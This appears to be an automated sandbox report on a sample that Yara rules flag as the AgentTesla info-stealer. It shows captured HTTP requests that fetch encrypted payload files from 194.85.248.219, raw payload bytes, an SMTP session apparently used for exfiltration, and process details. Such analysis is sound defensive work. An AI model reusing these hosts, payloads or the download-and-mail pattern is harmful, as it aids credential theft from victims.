                                                                                            Data Ascii: "9-(4&;$(9}}}yKI90$6+4<)mmm7(]]]78MMMGu`iHmdtf{dly===qepyX}CBM|\-"ovfJ}A5}Q]m}{%+Ui(vZqSq^M[uj!y:r6!..%;'8%/8~|b&1>>0+75;(HlR&)]\B69NL2FvanIme{gxekx><"Vfq~YpLw^vjh.,f^AKiLE\GXEKXvFQ^y^UKWHU[Hss0>*/*$9"*-oc'>??:*4)2:+oSS%*>9pL{-1:-O?3Ew~oJoiZdObj{?##UgvZzjtiqzk/hxMbII2qDYBF[uMVZz_ZHTIRZS
                                                                                            Nov 25, 2021 15:00:19.160068035 CET255INData Raw: 82 c3 8a c3 9b c2 9f c2 83 c2 83 c3 b5 c3 87 c3 96 c3 9f c3 ba c3 9f c3 9a c3 8a c3 94 c3 89 c3 92 c3 9a c3 8b 70 72 70 04 30 27 2c 0b 20 2b 39 25 3e 23 29 3a 60 62 60 14 20 37 3c 1b 33 4e 2b 3f 2e 37 39 2a 50 7c 60 2d 36 0f 22 28 00 0b 19 07 36
                                                                                            Data Ascii: prp0', +9%>#):`b` 7<3N+?.79*P|`-6"(63%8vZ@4';02:bpolK`xBg~cix"%T`wxyFQiunCyigRiLkCGoExC{ZtPW\CCD_waYI
                                                                                            Nov 25, 2021 15:00:19.160084009 CET257INData Raw: b4 c2 a6 c2 9b c2 8c c2 b6 c2 a4 c3 9a c3 8c c2 8d c2 91 c2 b1 c2 8c c2 bd c2 b1 c2 9a c2 8c c2 ae c2 b0 c2 ad c2 be c2 8a c2 94 c3 a5 c3 97 c3 97 c2 a7 c2 ab c3 bb c2 95 c2 a0 c2 93 c2 bc c2 9e c2 83 c2 a4 c2 bd c3 bc c2 87 c3 91 c3 b1 c3 85 c2
                                                                                            Data Ascii: 2%6tfb&< $?+
                                                                                            Nov 25, 2021 15:00:19.160100937 CET258INData Raw: a1 c3 86 c3 8d c3 87 c3 92 c3 87 c3 9d c3 b6 c3 82 c2 b0 c2 84 c2 83 c3 b8 c2 a0 c2 ac c3 95 c3 bc c3 96 04 30 0a 32 5f 22 33 77 6b 59 0f 09 2e 2e 0b 00 47 21 31 21 4a 58 2a 41 6b 6b 1e 2f 25 00 3a 27 02 12 0f 38 7f 0f 13 57 79 7b 43 39 0a 35 27
                                                                                            Data Ascii: 02_"3wkY..G!1!JX*Akk/%:'8Wy{C95'g&k!A=4!ProHIs%9JI\gA^|sLpi?^<OlRLQJW_fiNGbG+B\B^DA?9(}O|Nq
                                                                                            Nov 25, 2021 15:00:19.160116911 CET260INData Raw: bf c2 a1 c2 ba c2 9d c2 ba c2 9f c2 b2 c2 be c2 8d c2 a1 c2 aa c2 a9 c3 b8 c3 9a c3 9a c2 9e c2 ba c3 88 c2 99 c2 a8 c2 91 c2 af c2 98 c2 89 c2 82 c3 b0 c3 be c2 9c c3 9a c3 98 c3 94 c2 89 c2 a1 c2 99 c2 9a c2 bd c2 9a c2 bf c2 a9 c2 97 c2 a2 c2
                                                                                            Data Ascii: +&<%1D:M9
                                                                                            Nov 25, 2021 15:00:19.160132885 CET261INData Raw: b7 c2 9d c3 b7 c3 85 c3 80 c3 ab c3 aa c2 af c3 98 c3 aa c3 96 c3 8b c3 94 c3 96 c3 8d c2 bb c2 bb 61 03 35 34 44 0a 06 07 3b 27 38 3e 10 32 6e 7c 62 14 0a 48 0e 19 3e 35 21 33 38 03 1d 30 60 42 52 26 1f 74 03 29 0e 05 1f 0d 1c 01 0b 18 5e 6f 5a
                                                                                            Data Ascii: a54D;'8>2n|bH>5!380`BR&t)^oZh,9#+v~2FvO}LhNgxear=$"VfjIvnukt@\yh.,lpANiNB[GXEKXc6Q]|]{KWHQ[H
                                                                                            Nov 25, 2021 15:00:19.160149097 CET262INData Raw: ac c2 a2 c3 98 c3 ad c3 a6 c2 94 c2 88 c2 b8 c2 b4 c2 93 c2 9f c2 8e c3 86 c2 b2 c2 af c2 b0 c2 bb c2 91 c3 a7 c3 89 c3 a2 c2 b2 c2 91 c2 a2 c2 86 c2 a0 c2 91 c2 90 c2 b6 c2 94 c2 b9 c2 80 c2 88 c2 87 c3 a7 c3 a4 c3 b6 c2 a5 c2 81 c2 94 c2 9d c2
                                                                                            Data Ascii: 47pF"6)?!&DF
                                                                                            Nov 25, 2021 15:00:19.160170078 CET264INData Raw: 83 c3 ba c3 b6 c3 a7 c3 86 c2 84 c2 86 c2 8e c3 93 c2 bf c2 ae c3 90 c3 b7 c3 94 c3 b1 c3 87 2d 0b 05 13 31 75 75 7f 0a 3d 0e 34 03 0c 34 29 3d 31 0e 17 25 75 7d 76 1c 36 16 3e 12 23 44 18 0e 13 0c 0e 12 7d 20 53 2d 0b 71 72 20 05 0c 16 1a 13 08
                                                                                            Data Ascii: -1uu=44)=1%u}v6>#D} S-qr qlIB;3;k~bF@t!@KhaBL`xtfZta%_oVqPux|NSLDQ}wfAe|b\^CXAMYMXQpVvL
                                                                                            Nov 25, 2021 15:00:19.160187006 CET265INData Raw: bb c2 9d c2 a1 c2 bd c2 a6 c2 bf c2 b1 c2 a2 c3 a8 c3 aa c3 a8 c3 ac c2 a8 c2 bf c2 b4 c2 93 c2 8c c2 b5 c2 91 c2 8d c2 96 c2 8b c2 a7 c2 92 c3 88 c3 9a c3 98 c2 a9 c2 98 c2 8f c2 84 c2 a3 c2 9b c2 bd c2 81 c2 9d c2 86 c2 9f c2 91 c2 82 c3 88 c3
                                                                                            Data Ascii: 7( ?Q_}9,#?KE :'
                                                                                            Nov 25, 2021 15:00:19.160207987 CET266INData Raw: 92 c3 9b c3 be c3 98 c3 b8 c3 86 c3 98 c3 85 c3 92 c3 8b c3 83 c2 8b c2 87 c2 8f c3 a1 24 23 28 0f 2c 27 35 29 3a 24 43 3d 5a 7e 7c 0b 2d 46 3e 1f 3c 37 21 33 2a 3b 3d 2e 6e 5b 14 16 32 03 08 2c 05 7e 13 09 1a 07 09 19 73 2f 2a 28 04 13 1c 18 2a
                                                                                            Data Ascii: $#(,'5):$C=Z~|-F><7!3*;=.n[2,~s/*(*3jNL;\{FelgukUk~<>8l_Ax_|bEZh{}n,.,XPAYKu{cJGM\/<:~D[XYSM^dWTNr
                                                                                            Nov 25, 2021 15:00:19.187566042 CET268INData Raw: ba c2 95 c2 a7 c2 b6 c2 bb c2 90 c2 bb c2 a2 c2 a8 c2 b4 c2 a9 c2 aa c2 94 c2 bd c3 af c3 9b c3 93 c2 a6 c2 bb c3 be c3 ba c2 aa c2 8f c2 8a c2 90 c2 8e c2 9e c2 b0 c2 88 c2 9b c3 9f c3 9b c3 ad c2 91 c2 97 c2 96 c2 9f c2 b8 c2 b6 c2 96 c2 8e c2
                                                                                            Data Ascii: p\^0',3.>#)8Lx 76<
                                                                                            Nov 25, 2021 15:00:19.393758059 CET713OUTGET /publickey.txt HTTP/1.1
                                                                                            Host: 194.85.248.219
                                                                                            Nov 25, 2021 15:00:19.421961069 CET714INHTTP/1.1 200 OK
                                                                                            Content-Type: text/plain
                                                                                            Last-Modified: Fri, 29 Oct 2021 16:21:13 GMT
                                                                                            Accept-Ranges: bytes
                                                                                            ETag: "cb9899fde0ccd71:0"
                                                                                            Server: Microsoft-IIS/10.0
                                                                                            Date: Thu, 25 Nov 2021 14:00:18 GMT
                                                                                            Content-Length: 116559
                                                                                            Data Raw: 12 22 10 39 08 2d 28 34 26 3b 24 28 39 7d 7d 7d 79 4b 49 39 18 30 12 24 36 2b 34 3c 29 6d 6d 6d 37 15 00 09 28 0d 04 14 06 1b 04 0c 19 5d 5d 5d 37 05 10 19 38 1d 14 04 16 0b 14 1c 09 4d 4d 4d 47 75 60 69 48 6d 64 74 66 7b 64 6c 79 3d 3d 3d 71 65 70 79 58 7d 01 43 42 4d 01 7c 5c 2d 02 22 6f 76 66 4a 7d 41 35 7d 51 5d 6d 7d 7b 25 1e 2b 55 69 28 76 5a 71 53 71 5e 4d 5b 75 6a 21 79 3a c2 a2 c2 b7 c2 a3 c2 81 c2 93 c2 bf c2 a7 c2 8c c2 83 c2 ad c3 91 c2 8a c2 99 c3 ab c2 88 c3 9b c2 84 c2 a1 c3 88 c2 ac c2 90 c2 bb c3 84 c2 93 c2 ad c2 ad c2 a0 c2 88 c2 ac c3 bd c2 9c c3 a7 c2 ac c2 95 c2 80 c2 89 c2 a8 c2 8d c2 84 c2 94 c2 86 c2 9b c2 87 c2 9c c2 8a c3 8d c3 9d c3 9d c2 a2 c2 85 c2 94 c2 9c c2 b8 c2 99 c2 a6 c2 83 c2 ae c3 bd c2 a2 c2 9c c2 89 c3 8d c3 8d c3 8d c3 87 c3 b5 c3 a0 c3 a9 c3 88 c3 a3 c3 a4 c3 b4 c3 a3 c3 93 c3 a0 c3 a1 c3 b9 c2 aa c2 bd c2 bd c3 97 c3 aa c3 86 c3 b9 c3 98 c3 bd c3 b4 c3 a2 c3 b6 c3 ab c3 b4 c3 bc c3 a9 c2 ad c2 ad c2 ad c3 9c c3 a2 c3 b2 c3 89 c3 a8 c3 8d c3 84 c3 b2 c3 86 c3 9b c3 84 c3 8c c3 99 c2 9d c2 99 c2 9d c3 b7 c3 85 c3 93 c3 99 c3 b8 c3 9d c3 94 c3 a2 c3 96 c3 8b c3 94 c3 9c c3 89 c2 ab c2 8d 72 05 36 21 2e 09 2e 25 3b 27 38 25 2d 38 7e 7c 62 16 26 31 3e 19 3e 36 2b 37 38 35 3b 28 48 6c 52 26 16 01 0e 29 0e 09 1b 1f 10 11 0b 18 5d 5c 42 36 05 11 1e 39 1e 15 0b 13 08 15 1b 0c 4e 4c 32 46 76 61 6e 49 6d 65 7b 67 78 65 6b 78 3e 3c 22 56 66 71 7e 59 76 70 1d 77 68 76 76 68 2e 2c 12 66 56 41 4d 69 42 73 5e 47 58 45 4b 58 1e 1c 02 76 46 51 5e 79 5e 55 4b 57 48 55 5b 48 0e 0c c3 b2 c2 86 c2 b4 c2 a1 c2 ad c2 89 c2 ae c2 93 c2 bb c2 a7 c2 b8 c2 a5 c3 9a c3 92 c3 88 c3 bc c3 a2 c2 9f c2 a6 c2 b1 c2 be c2 99 c2 be c2 b5 c2 ab c2 b7 c2 a8 c2 b5 c2 bb c2 a8 c3 ae c3 ac c3 92 c2 a6 c2 96 c2 81 c2 8e c2 a9 c2 8e c2 85 c2 9b c2 87 c2 98 c2 85 c2 8b c2 98 c3 9e c3 9c c3 82 c2 b6 c2 86 c2 91 c2 9e c2 b9 c2 9e c2 95 c2 8b c2 97 c2 88 c2 95 c2 9b c2 88 c3 8e c3 8c c2 b2 c3 86 c3 b6 c3 a1 c3 ae c3 89 c3 ae c3 a5 c3 bb c3 a7 c3 b8 c3 a5 c3 ab c3 b0 c2 be c2 bc c2 a2 c3 94 c3 a6 c3 b1 c3 be c3 99 c3 be c3 b5 c3 ab c3 b7 c3 a8 c3 b5 c3 bb c3 a8 c2 ae c2 ac c2 92 c3 a4 c3 94 c3 81 c3 8e c3 a9 c3 8a c3 a3 c3 9b c3 87 c3 98 c3 85 c3 8b c3 98 c2 9e c2 9c c2 82 c3 b6 c3 86 c3 91 c3 9e c3 b9 c3 9c c2 a1 c2 ba c3 8c c3 91 c3 bc c2 aa c3 88 c2 8e 73 73 75 38 14 2f 0a 2f 2a 1c 24 39 22 2a 49 7f 63 63 15 27 3e 3f 1a 3f 3a 2a 34 29 32 3a 2b 6f 53 53 25 17 06 0f 2a 0d 0a 1a 04 1f 02 3e 39 70 4c 7b 2d 31 16 1f 3a 13 2c 0f 14 09 12 1a 0b 4f 37 33 45 77 76 6f 4a 6f 6f 5e 64 79 62 6a 7b 3f 23 23 55 67 76 7f 5a 7f 7a 6a 74 69 71 7a 6b 2f 10 13 68 78 4d 62 49 49 32 71 44 59 42 46 5b 1f 03 03 75 45 56 5c 7a 5f 5a 48 54 49 52 5a 3e 29 c3 b3 c3 b3 c2 85 c2 b7 c2 a6 c2 af c2 8a c2 af c2 aa c2 ba c2 a4 c2 b9 c2 a2 c2 aa c2 bb c3 bf c3 a3 c3 a3 c2 85 c2 a7 c2 b6 c2 bf c2 8a c2 99 c2 ba c2 aa c2 b4 c2 a9 c2 b2 c2 ba c2 ab c3 af c3 93 c3 93 c2 a5 c2 97 c2 86 c2 8f c2 aa c2 8f c2 8a c2 9a c2 84 c2 99 c2 80 c2 bc c3 b1 c3 a9 c3 83 c3 83 c2 b5 c2 87 c2 96 c2 9f c2 ba c2 9b c2 bc c2 8a c2 94 c2 89 c2 92 c2 98 c2 8b c3 8f c2 a7 c2 b3 c3 ac c3 be c3 94 c3 af c3 8a c3 af c3 93 c3 a2 c3 a4 c3 b9 c3 a2 c3 a9 c3 bb c2 bf c2 a3 c2 a3 c3 95 c3 a7 c3 b6 c3 bf c3 9a c3 b4 c3 bf c3 bf c3 b4 c3 a9 c3 b0 c2 8b c3 a0 c2 bf c2 93 c2 93 c3 a5 c3 97 c3 86 c3 8f c3 aa c3 8f c3 8a c3 9a c3 84 c3 99 c3
                                                                                            Data Ascii: "9-(4&;$(9}}}yKI90$6+4<)mmm7(]]]78MMMGu`iHmdtf{dly===qepyX}CBM|\-"ovfJ}A5}Q]m}{%+Ui(vZqSq^M[uj!y:r6!..%;'8%-8~|b&1>>6+785;(HlR&)]\B69NL2FvanIme{gxekx><"Vfq~Yvpwhvvh.,fVAMiBs^GXEKXvFQ^y^UKWHU[Hssu8//*$9"*Icc'>??:*4)2:+oSS%*>9pL{-1:,O73EwvoJoo^dybj{?##UgvZzjtiqzk/hxMbII2qDYBF[uEV\z_ZHTIRZ>)
                                                                                            Nov 25, 2021 15:00:21.621463060 CET969OUTGET /token_ta992i.txt HTTP/1.1
                                                                                            Host: 194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.650618076 CET971INHTTP/1.1 200 OK
                                                                                            Content-Type: text/plain
                                                                                            Last-Modified: Wed, 24 Nov 2021 19:04:41 GMT
                                                                                            Accept-Ranges: bytes
                                                                                            ETag: "55b9ce2266e1d71:0"
                                                                                            Server: Microsoft-IIS/10.0
                                                                                            Date: Thu, 25 Nov 2021 14:00:21 GMT
                                                                                            Content-Length: 442789
                                                                                            Data Raw: 12 22 10 39 08 2d 28 34 26 3b 24 28 39 7d 7d 7d 79 4b 49 39 18 30 12 24 36 2b 34 3c 29 6d 6d 6d 37 15 00 09 28 0d 04 14 06 1b 04 0c 19 5d 5d 5d 37 05 10 19 38 1d 14 04 16 0b 14 1c 09 4d 4d 4d 47 75 60 69 48 6d 64 74 66 7b 64 6c 79 3d 3d 3d 71 65 70 79 58 7d 01 43 42 4d 01 7c 5c 2d 02 22 6f 76 66 4a 7d 41 35 7d 51 5d 6d 7d 7b 25 1e 2b 55 69 28 76 5a 71 53 71 5e 4d 5b 75 6a 21 79 3a c2 a2 c2 b7 c2 a3 c2 81 c2 93 c2 bf c2 a7 c2 8c c2 83 c2 ad c3 91 c2 8a c2 99 c3 ab c2 88 c3 9b c2 84 c2 a1 c3 88 c2 ac c2 90 c2 bb c3 84 c2 93 c2 ad c2 ad c2 a0 c2 88 c2 ac c3 bd c2 9c c3 a7 c2 ac c2 95 c2 80 c2 89 c2 a8 c2 8d c2 84 c2 94 c2 86 c2 9b c2 87 c2 9c c2 8a c3 8d c3 9d c3 9d c2 a2 c2 85 c2 94 c2 9c c2 b8 c2 9f c2 9c c2 94 c2 bc c3 b8 c2 90 c2 9c c2 89 c3 8d c3 8d c3 8d c3 87 c3 b5 c3 a0 c3 a9 c3 88 c3 a3 c3 a4 c3 b4 c3 a6 c3 9d c3 a0 c3 a1 c3 b9 c2 ad c2 8f c2 bd c3 97 c3 a2 c3 96 c3 bc c3 98 c3 bd c3 b4 c3 ac c3 b6 c3 ab c3 b4 c3 bc c3 a9 c2 ad c2 ad c2 ad c3 b6 c3 ba c3 98 c3 8c c3 a8 c3 8d c3 84 c3 b2 c3 86 c3 9b c3 84 c3 8c c3 99 c2 9d c2 9d c2 9d c3 b7 c3 85 c3 93 c3 99 c3 b8 c3 9d c3 94 c3 a2 c3 96 c3 8b c3 94 c3 9c c3 89 c2 ab c2 8d 72 05 36 21 2e 09 2e 25 3b 27 38 25 2f 38 7e 7c 62 16 26 31 3e 19 3e 30 2b 37 1e 35 3b 28 48 6c 52 26 16 01 0e 29 0e 0d 1b 17 10 11 0b 18 5d 5c 42 36 05 11 1e 39 1e 15 0b 13 08 15 1b 0c 4e 4c 32 46 76 61 6e 49 6d 65 7b 67 78 65 6b 78 3e 3c 22 56 66 71 7e 59 70 4c 1b 77 5e 76 6a 68 2e 2c 12 66 5e 41 4b 69 4c 45 5c 47 58 45 4b 58 1e 1c 02 76 46 51 5e 79 5e 55 4b 57 48 55 5b 48 0e 0c c3 b2 c2 86 c2 bc c2 a1 c2 ab c2 89 c2 ae c2 93 c2 bb c2 a7 c2 b8 c2 a5 c2 ab c2 b8 c3 be c3 bc c3 a2 c2 96 c2 a6 c2 b1 c2 be c2 99 c2 be c2 b5 c2 ab c2 b7 c2 a8 c2 b5 c2 bb c2 a8 c3 ae c3 ac c3 92 c2 a6 c2 96 c2 81 c2 8e c2 a9 c2 8e c2 85 c2 9b c2 87 c2 98 c2 85 c2 8b c2 98 c3 9e c3 9c c3 82 c2 b6 c2 86 c2 91 c2 9e c2 b9 c2 9e c2 95 c2 8b c2 97 c2 88 c2 95 c2 9b c2 88 c3 8e c3 8c c2 b2 c3 86 c3 b6 c3 a1 c3 ae c3 89 c3 ae c3 a5 c3 bb c3 a7 c3 b8 c3 a5 c3 ab c3 b0 c2 be c2 bc c2 a2 c3 94 c3 a6 c3 b1 c3 be c3 99 c3 be c3 b5 c3 ab c3 b7 c3 a8 c3 b5 c3 bb c3 a8 c2 ae c2 ac c2 92 c3 a4 c3 94 c3 81 c3 8e c3 a9 c3 8a c3 a3 c3 9b c3 87 c3 98 c3 85 c3 8b c3 98 c2 9e c2 9c c2 82 c3 b6 c3 86 c3 91 c3 9e c3 b9 c3 9c c2 a1 c2 ba c3 8c c3 91 c3 bc c2 aa c3 88 c2 8e 73 73 16 30 3e 2a 0a 2f 2a 1c 24 39 22 2a 2d 7f 6f 63 15 27 3e 3f 1a 3f 3a 2a 34 29 32 3a 2b 6f 53 53 25 17 06 0f 2a 0d 0a 1a 04 1f 02 3e 39 70 4c 7b 2d 31 16 1f 3a 1d 1a 0d 14 09 12 1a 2d 4f 3f 33 45 77 7e 6f 4a 6f 69 5a 64 4f 62 6a 7b 3f 23 23 55 67 76 7f 5a 7f 7a 6a 74 69 71 7a 6b 2f 10 13 68 78 4d 62 49 49 32 71 44 59 42 46 5b 1f 03 03 75 4d 56 5a 7a 5f 5a 48 54 49 52 5a 53 0f c3 bf c3 b3 c2 85 c2 b7 c2 a6 c2 af c2 8a c2 af c2 aa c2 ba c2 a4 c2 b9 c2 a2 c2 aa c2 bb c3 bf c3 a3 c3 a3 c2 85 c2 a7 c2 b6 c2 bf c2 8a c2 99 c2 ba c2 aa c2 b4 c2 a9 c2 b2 c2 ba c2 ab c3 af c3 93 c3 93 c2 a5 c2 97 c2 86 c2 8f c2 aa c2 8f c2 8a c2 9a c2 84 c2 99 c2 82 c2 ac c2 be c3 b9 c3 8f c3 83 c2 b5 c2 87 c2 96 c2 9f c2 ba c2 9b c2 bc c2 8a c2 94 c2 89 c2 92 c2 98 c2 8b c3 8f c2 a7 c2 b3 c3 ab c3 bf c2 9f c3 ad c3 8a c3 ab c3 91 c3 96 c3 a4 c3 b9 c3 a2 c3 af c3 bb c2 bf c2 a3 c2 a3 c3 93 c3 b7 c3 b6 c3 bf c3 99 c3 99 c3 ba c3 aa c3 b4 c3 a9 c3 b2 c3 ba c3 ab c2 af c2 93 c2 93 c3 a5 c3 97 c3 86 c3 8f c3 aa c3 8f c3 8a c3 9a c3 84 c3 99 c3
                                                                                            Data Ascii: "9-(4&;$(9}}}yKI90$6+4<)mmm7(]]]78MMMGu`iHmdtf{dly===qepyX}CBM|\-"ovfJ}A5}Q]m}{%+Ui(vZqSq^M[uj!y:r6!..%;'8%/8~|b&1>>0+75;(HlR&)]\B69NL2FvanIme{gxekx><"Vfq~YpLw^vjh.,f^AKiLE\GXEKXvFQ^y^UKWHU[Hss0>*/*$9"*-oc'>??:*4)2:+oSS%*>9pL{-1:-O?3Ew~oJoiZdObj{?##UgvZzjtiqzk/hxMbII2qDYBF[uMVZz_ZHTIRZS
                                                                                            Nov 25, 2021 15:00:21.755748034 CET1446OUTGET /publickey.txt HTTP/1.1
                                                                                            Host: 194.85.248.219
                                                                                            Nov 25, 2021 15:00:21.783267021 CET1447INHTTP/1.1 200 OK
                                                                                            Content-Type: text/plain
                                                                                            Last-Modified: Fri, 29 Oct 2021 16:21:13 GMT
                                                                                            Accept-Ranges: bytes
                                                                                            ETag: "cb9899fde0ccd71:0"
                                                                                            Server: Microsoft-IIS/10.0
                                                                                            Date: Thu, 25 Nov 2021 14:00:21 GMT
                                                                                            Content-Length: 116559
                                                                                            Data Raw: 12 22 10 39 08 2d 28 34 26 3b 24 28 39 7d 7d 7d 79 4b 49 39 18 30 12 24 36 2b 34 3c 29 6d 6d 6d 37 15 00 09 28 0d 04 14 06 1b 04 0c 19 5d 5d 5d 37 05 10 19 38 1d 14 04 16 0b 14 1c 09 4d 4d 4d 47 75 60 69 48 6d 64 74 66 7b 64 6c 79 3d 3d 3d 71 65 70 79 58 7d 01 43 42 4d 01 7c 5c 2d 02 22 6f 76 66 4a 7d 41 35 7d 51 5d 6d 7d 7b 25 1e 2b 55 69 28 76 5a 71 53 71 5e 4d 5b 75 6a 21 79 3a c2 a2 c2 b7 c2 a3 c2 81 c2 93 c2 bf c2 a7 c2 8c c2 83 c2 ad c3 91 c2 8a c2 99 c3 ab c2 88 c3 9b c2 84 c2 a1 c3 88 c2 ac c2 90 c2 bb c3 84 c2 93 c2 ad c2 ad c2 a0 c2 88 c2 ac c3 bd c2 9c c3 a7 c2 ac c2 95 c2 80 c2 89 c2 a8 c2 8d c2 84 c2 94 c2 86 c2 9b c2 87 c2 9c c2 8a c3 8d c3 9d c3 9d c2 a2 c2 85 c2 94 c2 9c c2 b8 c2 99 c2 a6 c2 83 c2 ae c3 bd c2 a2 c2 9c c2 89 c3 8d c3 8d c3 8d c3 87 c3 b5 c3 a0 c3 a9 c3 88 c3 a3 c3 a4 c3 b4 c3 a3 c3 93 c3 a0 c3 a1 c3 b9 c2 aa c2 bd c2 bd c3 97 c3 aa c3 86 c3 b9 c3 98 c3 bd c3 b4 c3 a2 c3 b6 c3 ab c3 b4 c3 bc c3 a9 c2 ad c2 ad c2 ad c3 9c c3 a2 c3 b2 c3 89 c3 a8 c3 8d c3 84 c3 b2 c3 86 c3 9b c3 84 c3 8c c3 99 c2 9d c2 99 c2 9d c3 b7 c3 85 c3 93 c3 99 c3 b8 c3 9d c3 94 c3 a2 c3 96 c3 8b c3 94 c3 9c c3 89 c2 ab c2 8d 72 05 36 21 2e 09 2e 25 3b 27 38 25 2d 38 7e 7c 62 16 26 31 3e 19 3e 36 2b 37 38 35 3b 28 48 6c 52 26 16 01 0e 29 0e 09 1b 1f 10 11 0b 18 5d 5c 42 36 05 11 1e 39 1e 15 0b 13 08 15 1b 0c 4e 4c 32 46 76 61 6e 49 6d 65 7b 67 78 65 6b 78 3e 3c 22 56 66 71 7e 59 76 70 1d 77 68 76 76 68 2e 2c 12 66 56 41 4d 69 42 73 5e 47 58 45 4b 58 1e 1c 02 76 46 51 5e 79 5e 55 4b 57 48 55 5b 48 0e 0c c3 b2 c2 86 c2 b4 c2 a1 c2 ad c2 89 c2 ae c2 93 c2 bb c2 a7 c2 b8 c2 a5 c3 9a c3 92 c3 88 c3 bc c3 a2 c2 9f c2 a6 c2 b1 c2 be c2 99 c2 be c2 b5 c2 ab c2 b7 c2 a8 c2 b5 c2 bb c2 a8 c3 ae c3 ac c3 92 c2 a6 c2 96 c2 81 c2 8e c2 a9 c2 8e c2 85 c2 9b c2 87 c2 98 c2 85 c2 8b c2 98 c3 9e c3 9c c3 82 c2 b6 c2 86 c2 91 c2 9e c2 b9 c2 9e c2 95 c2 8b c2 97 c2 88 c2 95 c2 9b c2 88 c3 8e c3 8c c2 b2 c3 86 c3 b6 c3 a1 c3 ae c3 89 c3 ae c3 a5 c3 bb c3 a7 c3 b8 c3 a5 c3 ab c3 b0 c2 be c2 bc c2 a2 c3 94 c3 a6 c3 b1 c3 be c3 99 c3 be c3 b5 c3 ab c3 b7 c3 a8 c3 b5 c3 bb c3 a8 c2 ae c2 ac c2 92 c3 a4 c3 94 c3 81 c3 8e c3 a9 c3 8a c3 a3 c3 9b c3 87 c3 98 c3 85 c3 8b c3 98 c2 9e c2 9c c2 82 c3 b6 c3 86 c3 91 c3 9e c3 b9 c3 9c c2 a1 c2 ba c3 8c c3 91 c3 bc c2 aa c3 88 c2 8e 73 73 75 38 14 2f 0a 2f 2a 1c 24 39 22 2a 49 7f 63 63 15 27 3e 3f 1a 3f 3a 2a 34 29 32 3a 2b 6f 53 53 25 17 06 0f 2a 0d 0a 1a 04 1f 02 3e 39 70 4c 7b 2d 31 16 1f 3a 13 2c 0f 14 09 12 1a 0b 4f 37 33 45 77 76 6f 4a 6f 6f 5e 64 79 62 6a 7b 3f 23 23 55 67 76 7f 5a 7f 7a 6a 74 69 71 7a 6b 2f 10 13 68 78 4d 62 49 49 32 71 44 59 42 46 5b 1f 03 03 75 45 56 5c 7a 5f 5a 48 54 49 52 5a 3e 29 c3 b3 c3 b3 c2 85 c2 b7 c2 a6 c2 af c2 8a c2 af c2 aa c2 ba c2 a4 c2 b9 c2 a2 c2 aa c2 bb c3 bf c3 a3 c3 a3 c2 85 c2 a7 c2 b6 c2 bf c2 8a c2 99 c2 ba c2 aa c2 b4 c2 a9 c2 b2 c2 ba c2 ab c3 af c3 93 c3 93 c2 a5 c2 97 c2 86 c2 8f c2 aa c2 8f c2 8a c2 9a c2 84 c2 99 c2 80 c2 bc c3 b1 c3 a9 c3 83 c3 83 c2 b5 c2 87 c2 96 c2 9f c2 ba c2 9b c2 bc c2 8a c2 94 c2 89 c2 92 c2 98 c2 8b c3 8f c2 a7 c2 b3 c3 ac c3 be c3 94 c3 af c3 8a c3 af c3 93 c3 a2 c3 a4 c3 b9 c3 a2 c3 a9 c3 bb c2 bf c2 a3 c2 a3 c3 95 c3 a7 c3 b6 c3 bf c3 9a c3 b4 c3 bf c3 bf c3 b4 c3 a9 c3 b0 c2 8b c3 a0 c2 bf c2 93 c2 93 c3 a5 c3 97 c3 86 c3 8f c3 aa c3 8f c3 8a c3 9a c3 84 c3 99 c3
                                                                                            Data Ascii: "9-(4&;$(9}}}yKI90$6+4<)mmm7(]]]78MMMGu`iHmdtf{dly===qepyX}CBM|\-"ovfJ}A5}Q]m}{%+Ui(vZqSq^M[uj!y:r6!..%;'8%-8~|b&1>>6+785;(HlR&)]\B69NL2FvanIme{gxekx><"Vfq~Yvpwhvvh.,fVAMiBs^GXEKXvFQ^y^UKWHU[Hssu8//*$9"*Icc'>??:*4)2:+oSS%*>9pL{-1:,O73EwvoJoo^dybj{?##UgvZzjtiqzk/hxMbII2qDYBF[uEV\z_ZHTIRZ>)


                                                                                            SMTP Packets

                                                                                            TimestampSource PortDest PortSource IPDest IPCommands
                                                                                            Nov 25, 2021 15:02:08.517106056 CET58749817209.205.200.74192.168.2.5220-odin.mk-host.com ESMTP Exim 4.94.2 #2 Thu, 25 Nov 2021 15:02:08 +0100
                                                                                            220-We do not authorize the use of this system to transport unsolicited,
                                                                                            220 and/or bulk e-mail.
                                                                                            Nov 25, 2021 15:02:08.520540953 CET49817587192.168.2.5209.205.200.74EHLO 179605
                                                                                            Nov 25, 2021 15:02:08.621891975 CET58749817209.205.200.74192.168.2.5250-odin.mk-host.com Hello 179605 [84.17.52.63]
                                                                                            250-SIZE 52428800
                                                                                            250-8BITMIME
                                                                                            250-PIPELINING
                                                                                            250-PIPE_CONNECT
                                                                                            250-STARTTLS
                                                                                            250 HELP
                                                                                            Nov 25, 2021 15:02:08.622282982 CET49817587192.168.2.5209.205.200.74STARTTLS
                                                                                            Nov 25, 2021 15:02:08.728094101 CET58749817209.205.200.74192.168.2.5220 TLS go ahead

                                                                                            Code Manipulations

                                                                                            Statistics

                                                                                            CPU Usage

                                                                                            Click to jump to process

                                                                                            Memory Usage

                                                                                            Click to jump to process

                                                                                            High Level Behavior Distribution

                                                                                            Click to dive into process behavior distribution

                                                                                            Behavior

                                                                                            Click to jump to process

                                                                                            System Behavior

                                                                                            Analysis Process: W7UbgU8x18.exe PID: 5644 Parent PID: 6056

                                                                                            General

                                                                                            Start time:15:00:16
                                                                                            Start date:25/11/2021
                                                                                            Path:C:\Users\user\Desktop\W7UbgU8x18.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\W7UbgU8x18.exe"
                                                                                            Imagebase:0x410000
                                                                                            File size:24064 bytes
                                                                                            MD5 hash:01F140FEA9669403791FB89C47138D69
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:.Net C# or VB.NET
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.307259101.00000000038AA000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.307259101.00000000038AA000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000000.264523511.00000000038AA000.00000004.00000001.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000000.264523511.00000000038AA000.00000004.00000001.sdmp, Author: Joe Security
